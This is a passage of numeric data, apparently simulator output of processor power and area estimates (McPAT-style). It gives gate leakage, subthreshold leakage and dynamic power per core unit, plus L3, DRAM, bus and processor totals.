0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.221153, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0298789, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.450495, 'Memory Management Unit/Runtime Dynamic': 0.0727936, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 17.237, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 9.80115e-06, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00846019, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0963174, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.104787, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 3.30037, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 9.4469e-07, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.187525, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.302471, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.152677, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.642673, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.214472, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.2426, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00786564, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0568785, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0581712, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0568823, 'Execution Unit/Register Files/Runtime Dynamic': 0.0660369, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119827, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.321667, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.63844, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00218632, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00218632, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00197119, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000799674, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000835634, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00717947, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0185717, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0559215, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.55709, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.178281, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189935, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 5.94824, 'Instruction Fetch Unit/Runtime Dynamic': 0.449888, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0335487, 'L2/Runtime Dynamic': 0.00898409, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 2.74294, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.736636, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.048717, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.048717, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 2.973, 'Load Store Unit/Runtime Dynamic': 1.02561, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.120128, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.240255, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0426337, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0429167, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.221167, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0298807, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.450513, 'Memory Management Unit/Runtime Dynamic': 0.0727974, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 17.2374, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 9.80115e-06, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00846073, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0963235, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.104794, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 3.30052, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}], 'DRAM': {'Area': 0, 'Gate Leakage': 0, 'Peak Dynamic': 0.22089883829319112, 'Runtime Dynamic': 0.22089883829319112, 'Subthreshold Leakage': 4.252, 'Subthreshold Leakage with power gating': 4.252}, 'L3': [{'Area': 61.9075, 'Gate Leakage': 0.0484137, 'Peak Dynamic': 0.10377, 'Runtime Dynamic': 0.0655018, 'Subthreshold Leakage': 6.80085, 'Subthreshold Leakage with power gating': 3.32364}], 'Processor': {'Area': 191.908, 'Gate Leakage': 1.53485, 'Peak Dynamic': 74.1984, 'Peak Power': 107.311, 'Runtime Dynamic': 14.9651, 'Subthreshold Leakage': 31.5774, 'Subthreshold Leakage with power gating': 13.9484, 'Total Cores/Area': 128.669, 'Total Cores/Gate Leakage': 1.4798, 'Total Cores/Peak Dynamic': 74.0946, 'Total Cores/Runtime Dynamic': 14.8996, 'Total Cores/Subthreshold Leakage': 24.7074, 'Total Cores/Subthreshold Leakage with power gating': 10.2429, 'Total L3s/Area': 61.9075, 'Total L3s/Gate Leakage': 0.0484137, 'Total L3s/Peak Dynamic': 0.10377, 'Total L3s/Runtime Dynamic': 0.0655018, 'Total L3s/Subthreshold Leakage': 6.80085, 'Total L3s/Subthreshold Leakage with power gating': 3.32364, 'Total Leakage': 33.1122, 'Total NoCs/Area': 1.33155, 'Total NoCs/Gate Leakage': 0.00662954, 'Total NoCs/Peak Dynamic': 0.0, 'Total NoCs/Runtime Dynamic': 0.0, 'Total NoCs/Subthreshold Leakage': 0.0691322, 'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
power = {'BUSES': {'Area': 1.33155, 'Bus/Area': 1.33155, 'Bus/Gate Leakage': 0.00662954, 'Bus/Peak Dynamic': 0.0, 'Bus/Runtime Dynamic': 0.0, 'Bus/Subthreshold Leakage': 0.0691322, 'Bus/Subthreshold Leakage with power gating': 0.0259246, 'Gate Leakage': 0.00662954, 'Peak Dynamic': 0.0, 'Runtime Dynamic': 0.0, 'Subthreshold Leakage': 0.0691322, 'Subthreshold Leakage with power gating': 0.0259246}, 'Core': [{'Area': 32.6082, 'Execution Unit/Area': 8.2042, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 1.88938e-06, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 3.03604e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.122718, 'Execution Unit/Instruction Scheduler/Area': 2.17927, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.3257, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.563995, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.323467, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.21316, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.321937, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.50532, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 5.73574e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0118069, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0853788, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0873192, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0853846, 'Execution Unit/Register Files/Runtime Dynamic': 0.0991261, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.206311, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.553835, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155, 'Execution Unit/Runtime Dynamic': 2.47419, 'Execution Unit/Subthreshold Leakage': 1.83518, 'Execution Unit/Subthreshold Leakage with power gating': 0.709678, 'Gate Leakage': 0.372997, 'Instruction Fetch Unit/Area': 5.86007, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00309226, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00309226, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00274233, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00108839, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00125435, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0101812, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0278984, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0590479, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0839422, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.33945, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.267377, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.285106, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.82106, 'Instruction Fetch Unit/Runtime Dynamic': 0.674505, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932587, 'Instruction Fetch 